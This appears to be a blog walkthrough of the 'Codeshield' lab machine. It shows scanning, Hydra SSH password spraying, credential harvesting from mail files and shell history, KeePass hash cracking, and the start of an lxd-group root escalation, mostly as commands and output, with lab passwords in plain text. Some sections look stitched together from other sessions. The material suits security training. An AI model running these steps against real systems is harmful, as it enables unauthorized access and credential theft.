(remote) root@meltdown:/home/rin# whoami
root

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/meltdown/

HMV-Codeshield

呼啸山庄 — Mon, 12 Jan 2026 00:00:00 GMT

信息收集

IP定位

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep "08:00:27"
192.168.0.100   08:00:27:21:94:af       (Unknown)

nmap扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -sTCV -T4 -p0-65535 192.168.0.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-12 01:17 EST
Nmap scan report for 192.168.0.100
Host is up (0.0011s latency).
Not shown: 65522 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--    1 1002     1002      2349914 Aug 30  2023 CodeShield_pitch_deck.pdf
| -rw-rw-r--    1 1003     1003        67520 Aug 28  2023 Information_Security_Policy.pdf
|_-rw-rw-r--    1 1004     1004       226435 Aug 28  2023 The_2023_weak_password_report.pdf
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.0.106
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp    open  ssh           OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 32:14:67:32:02:7a:b6:e4:7f:a7:22:0b:02:fd:ee:07 (RSA)
|   256 34:e4:d0:5d:bd:bc:9e:3f:4c:f9:1e:7d:3c:60:ce:6e (ECDSA)
|_  256 ef:3c:ff:f9:9a:a3:aa:7d:5a:82:73:b9:8c:b8:97:04 (ED25519)
25/tcp    open  smtp          Postfix smtpd
|_smtp-commands: SMTP: EHLO 521 5.5.1 Protocol error\x0D
80/tcp    open  http          nginx
|_http-title: Did not follow redirect to https://192.168.0.100/
110/tcp   open  pop3          Dovecot pop3d
| ssl-cert: Subject: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN
| Not valid before: 2023-08-26T09:34:43
|_Not valid after:  2033-08-23T09:34:43
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: AUTH-RESP-CODE SASL STLS PIPELINING TOP CAPA RESP-CODES UIDL
143/tcp   open  imap          Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN
| Not valid before: 2023-08-26T09:34:43
|_Not valid after:  2033-08-23T09:34:43
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: post-login IMAP4rev1 listed Pre-login have more ENABLE capabilities ID OK LOGIN-REFERRALS LOGINDISABLEDA0001 SASL-IR IDLE LITERAL+ STARTTLS
443/tcp   open  ssl/http      nginx
| ssl-cert: Subject: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN
| Not valid before: 2023-08-26T09:34:43
|_Not valid after:  2033-08-23T09:34:43
| http-robots.txt: 1 disallowed entry 
|_/
|_ssl-date: TLS randomness does not represent time
|_http-title: CodeShield - Home
465/tcp   open  ssl/smtp      Postfix smtpd
| ssl-cert: Subject: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN
| Not valid before: 2023-08-26T09:34:43
|_Not valid after:  2033-08-23T09:34:43
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: mail.codeshield.hmv, PIPELINING, SIZE 15728640, ETRN, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
587/tcp   open  smtp          Postfix smtpd
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: mail.codeshield.hmv, PIPELINING, SIZE 15728640, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
| ssl-cert: Subject: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN
| Not valid before: 2023-08-26T09:34:43
|_Not valid after:  2033-08-23T09:34:43
993/tcp   open  imaps?
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: post-login IMAP4rev1 listed Pre-login have more ENABLE capabilities ID OK LOGIN-REFERRALS AUTH=LOGINA0001 SASL-IR IDLE LITERAL+ AUTH=PLAIN
| ssl-cert: Subject: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN
| Not valid before: 2023-08-26T09:34:43
|_Not valid after:  2033-08-23T09:34:43
995/tcp   open  pop3s?
| ssl-cert: Subject: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN
| Not valid before: 2023-08-26T09:34:43
|_Not valid after:  2033-08-23T09:34:43
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: AUTH-RESP-CODE USER SASL(PLAIN LOGIN) PIPELINING TOP CAPA RESP-CODES UIDL
2222/tcp  open  ssh           OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 32:14:67:32:02:7a:b6:e4:7f:a7:22:0b:02:fd:ee:07 (RSA)
|   256 34:e4:d0:5d:bd:bc:9e:3f:4c:f9:1e:7d:3c:60:ce:6e (ECDSA)
|_  256 ef:3c:ff:f9:9a:a3:aa:7d:5a:82:73:b9:8c:b8:97:04 (ED25519)
3389/tcp  open  ms-wbt-server xrdp
22222/tcp open  ssh           OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 2a:49:28:84:25:99:62:e8:29:68:88:d6:36:be:8e:d6 (ECDSA)
|_  256 20:9f:5b:3f:52:eb:a9:60:27:39:3b:e7:d8:17:8d:70 (ED25519)
Service Info: Hosts: -mail.codeshield.hmv,  mail.codeshield.hmv; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.67 seconds

根据110/tcp open pop3 Dovecot pop3d

| ssl-cert: Subject: commonName=mail.codeshield.hmv

添加hosts

192.168.0.100 mail.codeshield.hmv

21端口ftp-anonymous

┌──(root㉿kali)-[/home/kali/Desktop/hmv/Codeshield]
└─# ftp 192.168.0.100
Connected to 192.168.0.100.
220 (vsFTPd 3.0.5)
Name (192.168.0.100:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> mget *
mget CodeShield_pitch_deck.pdf [anpqy?]? 
229 Entering Extended Passive Mode (|||65107|)
150 Opening BINARY mode data connection for CodeShield_pitch_deck.pdf (2349914 bytes).
100% |***************************************************************|  2294 KiB  147.58 MiB/s    00:00 ETA
226 Transfer complete.
2349914 bytes received in 00:00 (144.86 MiB/s)
mget Information_Security_Policy.pdf [anpqy?]? 
229 Entering Extended Passive Mode (|||46568|)
150 Opening BINARY mode data connection for Information_Security_Policy.pdf (67520 bytes).
100% |***************************************************************| 67520      314.10 MiB/s    00:00 ETA
226 Transfer complete.
67520 bytes received in 00:00 (124.06 MiB/s)
mget The_2023_weak_password_report.pdf [anpqy?]? 
229 Entering Extended Passive Mode (|||35440|)
150 Opening BINARY mode data connection for The_2023_weak_password_report.pdf (226435 bytes).
100% |***************************************************************|   221 KiB  182.69 MiB/s    00:00 ETA
226 Transfer complete.
226435 bytes received in 00:00 (146.60 MiB/s)
ftp> bye
221 Goodbye.

Step 1：把 PDF 转成纯文本（

pdftotext CodeShield_pitch_deck.pdf pitch.txt pdftotext Information_Security_Policy.pdf policy.txt pdftotext The_2023_weak_password_report.pdf weakpass.txt

Step 2：根据整理的文本做字典

✅ 一、账号用户名列表（users.txt）

基于你给的 PDF、Pitch Deck、Policy 中的姓名规则与组织结构，企业最常见三种格式：

🔹 格式 1：`first.last`

jessica.carlson
j.carlson
jcarlson
admin
administrator
itadmin
support
helpdesk
finance
invest
hr
ceo

🔹 格式 2：常见员工名（根据文档推断）

jessica
carlson
codeshield
guest
test
user
info
sales
marketing
security

👉 **保存为 ****users.txt**

✅ 二、密码字典（pass.txt）

🔐 1️⃣ 来自《Weak Password Report》的高命中组合

Password123!
Password12345
Hairdresser1!
Greatplace2work!
Xxxxxxxxx001
Xxxxxxxxx002
Xxxxxxxxxx01
1qa2ws3ed4rf

🎬 2️⃣ 影视 / 流行文化（报告中明确提到）

Yoda123!
Starwars123
Loki2023!
Thor2023
Batman123!
Matrix123
Rocky2023
Ironman!

📅 3️⃣ 企业常见“年份 + 符号”

Summer2023!
May2023!
August2023!
Winter2022!

👩‍💼 4️⃣ CEO / 管理层常见弱口令模式（非常真实）

Jessica2023!
Carlson2023!
Jessica@123
Carlson@123
Welcome123!
Welcome@2023

🧠 5️⃣ IT / 默认 / 服务账号

admin123!
admin@123
Admin2023!
Root123!
P@ssw0rd
ChangeMe123!

👉 **保存为 ****passwd.txt**

22端口ssh-密码喷洒

上面做的字典喷洒失败了

https://mail.codeshield.hmv

提取人名作为字典

Angelina Johnson
John Doe
Bob Watson
Jennifer Cruise
Jessica Carlson 
Mohammed Mansour 
Xian Tan 
Annabella Cocci 
Thomas Mitchell
Patrick Early
Kevin Valdez


Angelina
Johnson
John
Doe
Bob
Watson
Jennifer
Cruise
Jessica
Carlson 
Mohammed
Mansour 
Xian
Tan 
Annabella
Cocci 
Thomas
Mitchell
Patrick
Early
Kevin
Valdez

angelina
johnson
john
doe
bob
watson
jennifer
cruise
jessica
carlson 
mohammed
mansour 
xian
tan 
annabella
cocci 
thomas
mitchell
patrick
early
kevin
valdez

继续爆破

[22][ssh] host: 192.168.0.100   password: Password123!
[STATUS] attack finished for 192.168.0.100 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-12 03:44:18

？？？wdf

22端口ssh-登录

直接ssh登录试试

root/Password123!

还真登录进去了

┌──(root㉿kali)-[/home/kali/Desktop/hmv/Codeshield]
└─# ssh 192.168.0.100     
The authenticity of host '192.168.0.100 (192.168.0.100)' can't be established.
ED25519 key fingerprint is SHA256:p41YgA92zNuiXv+R9wkRqYw3Z4EChD83xgSfLoouuFw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.100' (ED25519) to the list of known hosts.
root@192.168.0.100's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@svr04:~#

搜了一圈没发现什么

22222端口ssh-爆破

🔴 OpenSSH 6.0p1（22 端口）

发布年份：2012
对应系统：Debian 7（Wheezy）
特点：
- 支持很多 已废弃的加密算法
- 不支持或默认不启用现代安全特性
- 存在大量历史安全问题
现实意义：
- 经常用于 老系统 / legacy 服务
- 在安全审计中通常是 高风险项

📌 你看到它本身，就已经是一个安全红旗

🟢 OpenSSH 8.9p1（22222 端口）

发布年份：2022+
对应系统：Ubuntu（较新 LTS）
特点：
- 默认禁用弱算法（如 ssh-rsa）
- 强制更安全的密钥交换
- 对暴力破解和中间人攻击防护更好
使用非 22 端口：
- 不是安全手段
- 只是减少无脑扫描噪音

📌 这是“现代标准 SSH”

┌──(root㉿kali)-[/home/kali/Desktop/hmv/Codeshield]  
└─# hydra -L users.txt -P passwd.txt ssh://192.168.0.100 -f -V -s 22222 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). 

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-12 03:54:47

得了还是爆破不出来

用户名字典生成

通过看wp得知一款工具

现在用username-anarchy工具，生成了一个包含潜在用户的更大列表。

┌──(root㉿kali)-[/home/kali/Desktop/hmv/Codeshield]  
└─# cat users.txt
Angelina Johnson 
John Doe 
Bob Watson 
Jennifer Cruise 
Jessica Carlson  
Mohammed Mansour  
Xian Tan  
Annabella Cocci  
Thomas Mitchell 
Patrick Early 
Kevin Valdez

┌──(root㉿kali)-[/home/kali/Desktop/tools/username-anarchy]
└─# ./username-anarchy --input-file ../../hmv/Codeshield/users.txt > anarchy_users

──(root㉿kali)-[/home/kali/Desktop/hmv/Codeshield]
└─# hydra -L anarchy_users -P passwd.txt ssh://192.168.0.100 -f -s 22222 -V  
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-12 04:35:09
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 5115 login tries (l:155/p:33), ~320 tries per task
[DATA] attacking ssh://192.168.0.100:22222/

最后爆破出来为valdezk/Greatplace2work!

valdezk登录

┌──(root㉿kali)-[/home/kali/Desktop/hmv/Codeshield]
└─# ssh valdezk@192.168.0.100 -p 22222
The authenticity of host '[192.168.0.100]:22222 ([192.168.0.100]:22222)' can't be established.
ED25519 key fingerprint is SHA256:Y+iV2eHvzSBp6ZbF+2VqTJdZ5+XyH5tVaxNCzS7tp3I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.0.100]:22222' (ED25519) to the list of known hosts.
             @@@                            
      @@@@@@@@@  @@@@@@                     
 @@@@@@@@@@@@@@          (@@                
 @@@@@@@@@@@@@@           @@    ██████╗ ██████╗ ██████╗ ███████╗███████╗██╗  ██╗██╗███████╗██╗     ██████╗                                   
 @@@@@@@@@@@@@@           @@   ██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝██║  ██║██║██╔════╝██║     ██╔══██╗             
  @@@@@@@@@@@@@          @@    ██║     ██║   ██║██║  ██║█████╗  ███████╗███████║██║█████╗  ██║     ██║  ██║             
  @@@@@@@@@@@@@         @@@    ██║     ██║   ██║██║  ██║██╔══╝  ╚════██║██╔══██║██║██╔══╝  ██║     ██║  ██║             
    @@@@@@@@@@@        @@      ╚██████╗╚██████╔╝██████╔╝███████╗███████║██║  ██║██║███████╗███████╗██████╔╝             
     @@@@@@@@@@      @@@        ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚══════╝╚═════╝              
        @@@@@@@   @@@                       
           @@@@@@@                                                           

  _______________________________________________________________________________________________________
 |  _WARNING: This system is restricted to authorized users!___________________________________________  |
 | |                                                                                                   | |
 | | IT IS AN OFFENSE TO CONTINUE WITHOUT PROPER AUTHORIZATION.                                        | |
 | |                                                                                                   | |
 | | This system is restricted to authorized users.                                                    | | 
 | | Individuals who attempt unauthorized access will be prosecuted.                                   | | 
 | | If you're unauthorized, terminate access now!                                                     | | 
 | |                                                                                                   | |
 | |                                                                                                   | |
 | |___________________________________________________________________________________________________| |
 |_______________________________________________________________________________________________________|
valdezk@192.168.0.100's password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-79-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Jan 12 09:38:38 AM UTC 2026

  System load:  0.01416015625      Processes:               235
  Usage of /:   29.3% of 47.93GB   Users logged in:         0
  Memory usage: 58%                IPv4 address for enp0s3: 192.168.0.100
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

10 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
New release '24.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


valdezk@codeshield:~$

权限提升

用户mitchellt

valdezk@codeshield:~$ grep -ri password
[...]
.thunderbird/fx2h7mhy.default-release/ImapMail/mail.codeshield.hmv/Trash:Password: D@taWh1sperer!
[...]

hydra -L anarchy_users -p 'D@taWh1sperer!' ssh://192.168.0.100 -s 22222 -f -V

[ATTEMPT] target 192.168.0.100 - login "mitchellt" - pass "D@taWh1sperer!" - 122 of 156 [child 11] (0/1)
[22222][ssh] host: 192.168.0.100   login: mitchellt   password: D@taWh1sperer!
[STATUS] attack finished for 192.168.0.100 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-12 04:48:23

通过爆破得出用户是mitchellt

valdezk@codeshield:~$ su mitchellt
Password: 
mitchellt@codeshield:/home/valdezk$

mitchellt@codeshield:/home$ cd ~
mitchellt@codeshield:~$ cat user.txt 
             @@@                            
      @@@@@@@@@  @@@@@@                     
 @@@@@@@@@@@@@@          (@@                
 @@@@@@@@@@@@@@           @@    ██████╗ ██████╗ ██████╗ ███████╗███████╗██╗  ██╗██╗███████╗██╗     ██████╗  
 @@@@@@@@@@@@@@           @@   ██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝██║  ██║██║██╔════╝██║     ██╔══██╗ 
  @@@@@@@@@@@@@          @@    ██║     ██║   ██║██║  ██║█████╗  ███████╗███████║██║█████╗  ██║     ██║  ██║ 
  @@@@@@@@@@@@@         @@@    ██║     ██║   ██║██║  ██║██╔══╝  ╚════██║██╔══██║██║██╔══╝  ██║     ██║  ██║ 
    @@@@@@@@@@@        @@      ╚██████╗╚██████╔╝██████╔╝███████╗███████║██║  ██║██║███████╗███████╗██████╔╝ 
     @@@@@@@@@@      @@@        ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚══════╝╚═════╝  
        @@@@@@@   @@@                       
           @@@@@@@                          

  _______________________________________________________________________________________________________
 |  _USER FLAG!________________________________________________________________________________________  |
 | |                                                                                                   | |
 | | Your_password_is_the_key_to_your_digital_life                                                     | |
 | |                                                                                                   | |
 | |___________________________________________________________________________________________________| |
 |_______________________________________________________________________________________________________|

用户earlyp

earlyp/EARL!YP7DeVel@OP

利用mitchellt翻查history中发现

mitchellt@codeshield:/home$ history
    1  echo 'EARL!YP7DeVel@OP'| su - earlyp -c "cp -r /home/earlyp/Development/mining ."
    2  echo 'EARL!YP7DeVel@OP'| su - earlyp -c "cp -r /home/earlyp/Development/mining /tmp"

提权root

(方法一:kdbx文件)

信息搜集可以找到一个.kdbx文件，破解一下即可得到root密码：

`plain earlyp@codeshield:~$ grep -Pnir password`

找到一个密码文件：

`plain .cache/keepassxc/keepassxc.ini:2:LastActiveDatabase=/home/earlyp/Documents/Passwords.kdbx .cache/keepassxc/keepassxc.ini:4:LastDatabases=/home/earlyp/Documents/Passwords.kdbx .cache/keepassxc/keepassxc.ini:6:LastOpenedDatabases=/home/earlyp/Documents/Passwords.kdbx`

拷贝到本地进行破解：

earlyp@codeshield:~$ cd Documents
earlyp@codeshield:~/Documents$ ls
Passwords.kdbx

| plain ┌──(root㉿kali)-[/home/kali/Desktop/hmv/Codeshield] └─# scp -P 22222 earlyp@192.168.0.100:~/Documents/Passwords.kdbx . @@@ @@@@@@@@@ @@@@@@ @@@@@@@@@@@@@@ (@@ @@@@@@@@@@@@@@ @@ ██████╗ ██████╗ ██████╗ ███████╗███████╗██╗ ██╗██╗███████╗██╗ ██████╗ @@@@@@@@@@@@@@ @@ ██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝██║ ██║██║██╔════╝██║ ██╔══██╗ @@@@@@@@@@@@@ @@ ██║ ██║ ██║██║ ██║█████╗ ███████╗███████║██║█████╗ ██║ ██║ ██║ @@@@@@@@@@@@@ @@@ ██║ ██║ ██║██║ ██║██╔══╝ ╚════██║██╔══██║██║██╔══╝ ██║ ██║ ██║ @@@@@@@@@@@ @@ ╚██████╗╚██████╔╝██████╔╝███████╗███████║██║ ██║██║███████╗███████╗██████╔╝ @@@@@@@@@@ @@@ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝╚═╝╚══════╝╚══════╝╚═════╝ @@@@@@@ @@@ @@@@@@@ _______________________________________________________________________________________________________ | _WARNING: This system is restricted to authorized users!___________________________________________ | | | | | | | IT IS AN OFFENSE TO CONTINUE WITHOUT PROPER AUTHORIZATION. | | | | | | | | This system is restricted to authorized users. | | | | Individuals who attempt unauthorized access will be prosecuted. | | | | If you're unauthorized, terminate access now! | | | | | | | | | | | |___________________________________________________________________________________________________| | |_______________________________________________________________________________________________________| earlyp@192.168.0.100's password: Passwords.kdbx 100% 1918 878.7KB/s 00:00 ┌──(root㉿kali)-[/home/kali/Desktop/hmv/Codeshield] └─# keepass2john Passwords.kdbx > hash ┌──(root㉿kali)-[/home/kali/Desktop/hmv/Codeshield] └─# john hash --wordlist=pass Using default input encoding: UTF-8 Loaded 1 password hash (KeePass [SHA256 AES 32/64]) Cost 1 (iteration count) is 3225806 for all loaded hashes Cost 2 (version) is 2 for all loaded hashes Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes Will run 4 OpenMP threads fopen: pass: No such file or directory ┌──(root㉿kali)-[/home/kali/Desktop/hmv/Codeshield] └─# john hash --wordlist=../../wordlists/kali/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (KeePass [SHA256 AES 32/64]) Cost 1 (iteration count) is 3225806 for all loaded hashes Cost 2 (version) is 2 for all loaded hashes Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status | | --- |

那只能rockyou了，这里快速剽窃了一下密码：

`plain mandalorian`

去在线的管理器上打开文件看一下密码：

https://app.keeweb.info/

`plain root:7%z5,c9=w6[x8=`

切换用户拿到rootshell！

| plain earlyp@codeshield:~/Documents$ su - root Password: root@codeshield:~# ls -la total 92 drwx------ 9 root root 4096 Aug 26 2023 . drwxr-xr-x 19 root root 4096 Aug 22 2023 .. -rw------- 1 root root 0 Aug 30 2023 .bash_history -rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc drwx------ 2 root root 4096 Aug 28 2023 .cache drwxr-xr-x 2 root root 4096 Aug 26 2023 cowrie drwxr-xr-x 3 root root 4096 Aug 26 2023 .iredmail drwx------ 3 root root 4096 Aug 23 2023 .launchpadlib -rw------- 1 root root 20 Aug 23 2023 .lesshst drwxr-xr-x 3 root root 4096 Aug 22 2023 .local -r-------- 1 root root 45 Aug 26 2023 .my.cnf -rw-r--r-- 1 root root 91 Aug 26 2023 .my.cnf-amavisd -rw-r--r-- 1 root root 92 Aug 26 2023 .my.cnf-fail2ban -rw-r--r-- 1 root root 93 Aug 26 2023 .my.cnf-iredadmin -rw-r--r-- 1 root root 91 Aug 26 2023 .my.cnf-iredapd -rw-r--r-- 1 root root 93 Aug 26 2023 .my.cnf-roundcube -r-------- 1 root root 89 Aug 26 2023 .my.cnf-vmail -r-------- 1 root root 94 Aug 26 2023 .my.cnf-vmailadmin -rw-r--r-- 1 root root 161 Jul 9 2019 .profile -rw-r--r-- 1 root root 2528 Aug 26 2023 root.txt -rw-r--r-- 1 root root 66 Aug 26 2023 .selected_editor drwx------ 4 root root 4096 Aug 22 2023 snap drwx------ 2 root root 4096 Aug 22 2023 .ssh -rw-r--r-- 1 root root 0 Aug 22 2023 .sudo_as_admin_successful -rw-r--r-- 1 root root 290 Aug 26 2023 .wget-hsts root@codeshield:~# cat root.txt @@@ @@@@@@@@@ @@@@@@ @@@@@@@@@@@@@@ (@@ @@@@@@@@@@@@@@ @@ ██████╗ ██████╗ ██████╗ ███████╗███████╗██╗ ██╗██╗███████╗██╗ ██████╗ @@@@@@@@@@@@@@ @@ ██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝██║ ██║██║██╔════╝██║ ██╔══██╗ @@@@@@@@@@@@@ @@ ██║ ██║ ██║██║ ██║█████╗ ███████╗███████║██║█████╗ ██║ ██║ ██║ @@@@@@@@@@@@@ @@@ ██║ ██║ ██║██║ ██║██╔══╝ ╚════██║██╔══██║██║██╔══╝ ██║ ██║ ██║ @@@@@@@@@@@ @@ ╚██████╗╚██████╔╝██████╔╝███████╗███████║██║ ██║██║███████╗███████╗██████╔╝ @@@@@@@@@@ @@@ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝╚═╝╚══════╝╚══════╝╚═════╝ @@@@@@@ @@@ @@@@@@@ _______________________________________________________________________________________________________ | _ROOT FLAG!________________________________________________________________________________________ | | | | | | | Educate_your_employees_on_password_safety | | | | | | | |___________________________________________________________________________________________________| | |_______________________________________________________________________________________________________| | | --- |

(方法2:lxd)

原因是一个特殊的lxd组权限：

`plain earlyp@codeshield:~$ id uid=1000(earlyp) gid=1000(earlyp) groups=1000(earlyp),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd)`

参考：

https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.html#with-internet

https://github.com/saghul/lxd-alpine-builder

| plain ┌──(kali💀kali)-[~/temp/codeshield] └─$ git clone https://github.com/saghul/lxd-alpine-builder Cloning into 'lxd-alpine-builder'... remote: Enumerating objects: 50, done. remote: Counting objects: 100% (8/8), done. remote: Compressing objects: 100% (6/6), done. remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42 (from 1) Receiving objects: 100% (50/50), 3.11 MiB | 3.21 MiB/s, done. Resolving deltas: 100% (15/15), done. ┌──(root㉿kali)-[/home/kali/Desktop/tools] └─# cd lxd-alpine-builder ┌──(root㉿kali)-[/home/kali/Desktop/tools/lxd-alpine-builder] └─# sudo ./build-alpine Determining the latest release... v3.23 Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.8/main/x86 Downloading alpine-keys-2.1-r1.apk alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: OK Verified OK % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 3264 100 3264 0 0 831 0 0:00:03 0:00:03 --:--:-- 832 --2025-05-30 04:04:20-- http://alpine.mirror.wearetriple.com/MIRRORS.txt Resolving alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)... 93.187.10.24, 2a00:1f00:dc06:10::6 Connecting to alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)|93.187.10.24|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3264 (3.2K) [text/plain] Saving to: ‘/home/kali/temp/codeshield/lxd-alpine-builder/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’ /home/kali/temp/codeshield/lxd-alpine-builder/r 100%[====================================================================================================>] 3.19K --.-KB/s in 0s 2025-05-30 04:04:21 (9.01 MB/s) - ‘/home/kali/temp/codeshield/lxd-alpine-builder/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’ saved [3264/3264] Selecting mirror http://mirrors.ocf.berkeley.edu/alpine//v3.8/main fetch http://mirrors.ocf.berkeley.edu/alpine//v3.8/main/x86/APKINDEX.tar.gz (1/18) Installing musl (1.1.19-r11) (2/18) Installing busybox (1.28.4-r3) Executing busybox-1.28.4-r3.post-install (3/18) Installing alpine-baselayout (3.1.0-r0) Executing alpine-baselayout-3.1.0-r0.pre-install Executing alpine-baselayout-3.1.0-r0.post-install (4/18) Installing openrc (0.35.5-r5) Executing openrc-0.35.5-r5.post-install (5/18) Installing alpine-conf (3.8.0-r0) (6/18) Installing libressl2.7-libcrypto (2.7.5-r0) (7/18) Installing libressl2.7-libssl (2.7.5-r0) (8/18) Installing libressl2.7-libtls (2.7.5-r0) (9/18) Installing ssl_client (1.28.4-r3) (10/18) Installing zlib (1.2.11-r1) (11/18) Installing apk-tools (2.10.6-r0) (12/18) Installing busybox-suid (1.28.4-r3) (13/18) Installing busybox-initscripts (3.1-r4) Executing busybox-initscripts-3.1-r4.post-install (14/18) Installing scanelf (1.2.3-r0) (15/18) Installing musl-utils (1.1.19-r11) (16/18) Installing libc-utils (0.7.1-r0) (17/18) Installing alpine-keys (2.1-r1) (18/18) Installing alpine-base (3.8.5-r0) Executing busybox-1.28.4-r3.trigger OK: 7 MiB in 18 packages ┌──(root㉿kali)-[/home/kali/Desktop/tools/lxd-alpine-builder] └─# ls -la 总计 7256 drwxr-xr-x 3 root root 4096 1月12日 05:53 . drwxrwxrwx 43 kali kali 4096 1月12日 05:34 .. -rw-r--r-- 1 root root 3259593 1月12日 05:34 alpine-v3.13-x86_64-20210218_0139.tar.gz -rw-r--r-- 1 root root 4113983 1月12日 05:53 alpine-v3.23-x86_64-20260112_0553.tar.gz -rwxr-xr-x 1 root root 8064 1月12日 05:34 build-alpine drwxr-xr-x 7 root root 4096 1月12日 05:34 .git -rw-r--r-- 1 root root 26530 1月12日 05:34 LICENSE -rw-r--r-- 1 root root 768 1月12日 05:34 README.md ┌──(root㉿kali)-[/home/kali/Desktop/tools/lxd-alpine-builder] └─# python3 -m http.server 8888 Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ... | | --- 